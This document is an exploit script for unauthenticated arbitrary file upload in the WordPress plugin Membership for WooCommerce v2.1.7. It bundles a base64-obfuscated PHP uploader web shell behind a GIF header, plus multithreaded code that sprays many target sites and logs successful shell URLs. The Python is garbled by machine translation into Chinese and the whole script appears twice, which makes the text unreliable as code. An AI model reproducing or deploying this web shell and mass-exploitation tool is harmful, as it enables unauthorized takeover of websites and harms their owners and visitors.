#利用title: WordPress插件- WooCommerce v2.1.7的会员资格- 任意文件上传到Shell(未经身份验证)
#日期: 2024-02-25
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,RE,JSON
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
标题={'Connection':'keep-alive','cache-control':'max-age=0',
'升级-Insecure-Requests':'1','用户代理:'mozlila/5.0(linux;
Android 7.0; SM-G892A BULID/NRD90M; WV)AppleWebkit/537.36(Khtml,喜欢
Gecko)版本/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'Accept-编码:'GZIP,DEFLATE','Accept-Language':
'en-us,en; q=0.9,fr; q=0.8','referer':'www.google.com'}
uploader='''
GIF89A
?php?
!doctype html
html
头
titleresultz/title
/头
Bodyh1uploader/H1
form enctype='multipart/form-data'action=''method='post'
puploaded/p
输入type='file'name='uploaded_file' /inputbr /
输入类型='submit'value='upload'/input
/形式
/身体
/html
php
if(!empty($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==')]))){$ fdudxfib_d6fe1d0be6347b8ef247b8ef2427fa629c044485=base64_d ecode('li8='); $ fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$ fdudxfib_d6fe1d6fe1d0be6347b8ef247b8ef22427fa文件[base64_decode('dxbsb2fkzwrfzmlszq==')] ecode('dxbsb2fkzwrfzmlszq==')] [base64_decode('dg1wx25hbwu=')],$ fdudxfib_d6fe1d0be6347b8ef247b8ef242427f2427fa629c04485))
base64_decode('vghligzpbgug')。basename($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==' )[base64_decode('bmftzq==')])。base64_decode('ighhcybizwvuihvwbg9hzgvk');} else {echo
base64_decode('vghlcmugd2fzigfuigvycm9yihvwbg9hzgluzyb0agugzmlszmlszswgcgcgxlyxnlryesbhz2fpbie='');}}}?
'''
requests.urllib3.disable_warnings()
DEF漏洞利用(域):
TRY:
如果域中的“ http” :
域=域
其他:
域='http://'+域
myup={'':('db.php',uploader)}
req=requests.post(域+
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup,标头=标题,验证=false,timeout=10).text
req1=requests.get(域+
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
如果REQ1:中的“ ex3”
打印(fg+'[+]'+域+' - 上载')
打开('shellz.txt','a')。写(域+
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' +'\ n')
其他:
print(fr+'[+]'+域+'{} {} - 不是漏洞')
Except:
打印(fr +' - |' + domain +' - {} [失败]')
target=open(输入(fm+'站点list:'),'r')。read()。splitlines()
mp=pool(int(输入(fm+'threads:'))))))
MP.MAP(利用,目标)
mp.close()
MP.Join()
#日期: 2024-02-25
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,RE,JSON
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
标题={'Connection':'keep-alive','cache-control':'max-age=0',
'升级-Insecure-Requests':'1','用户代理:'mozlila/5.0(linux;
Android 7.0; SM-G892A BULID/NRD90M; WV)AppleWebkit/537.36(Khtml,喜欢
Gecko)版本/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'Accept-编码:'GZIP,DEFLATE','Accept-Language':
'en-us,en; q=0.9,fr; q=0.8','referer':'www.google.com'}
uploader='''
GIF89A
?php?
!doctype html
html
头
titleresultz/title
/头
Bodyh1uploader/H1
form enctype='multipart/form-data'action=''method='post'
puploaded/p
输入type='file'name='uploaded_file' /inputbr /
输入类型='submit'value='upload'/input
/形式
/身体
/html
php
if(!empty($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==')]))){$ fdudxfib_d6fe1d0be6347b8ef247b8ef2427fa629c044485=base64_d ecode('li8='); $ fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$ fdudxfib_d6fe1d6fe1d0be6347b8ef247b8ef22427fa文件[base64_decode('dxbsb2fkzwrfzmlszq==')] ecode('dxbsb2fkzwrfzmlszq==')] [base64_decode('dg1wx25hbwu=')],$ fdudxfib_d6fe1d0be6347b8ef247b8ef242427f2427fa629c04485))
base64_decode('vghligzpbgug')。basename($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==' )[base64_decode('bmftzq==')])。base64_decode('ighhcybizwvuihvwbg9hzgvk');} else {echo
base64_decode('vghlcmugd2fzigfuigvycm9yihvwbg9hzgluzyb0agugzmlszmlszswgcgcgxlyxnlryesbhz2fpbie='');}}}?
'''
requests.urllib3.disable_warnings()
DEF漏洞利用(域):
TRY:
如果域中的“ http” :
域=域
其他:
域='http://'+域
myup={'':('db.php',uploader)}
req=requests.post(域+
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup,标头=标题,验证=false,timeout=10).text
req1=requests.get(域+
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
如果REQ1:中的“ ex3”
打印(fg+'[+]'+域+' - 上载')
打开('shellz.txt','a')。写(域+
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' +'\ n')
其他:
print(fr+'[+]'+域+'{} {} - 不是漏洞')
Except:
打印(fr +' - |' + domain +' - {} [失败]')
target=open(输入(fm+'站点list:'),'r')。read()。splitlines()
mp=pool(int(输入(fm+'threads:'))))))
MP.MAP(利用,目标)
mp.close()
MP.Join()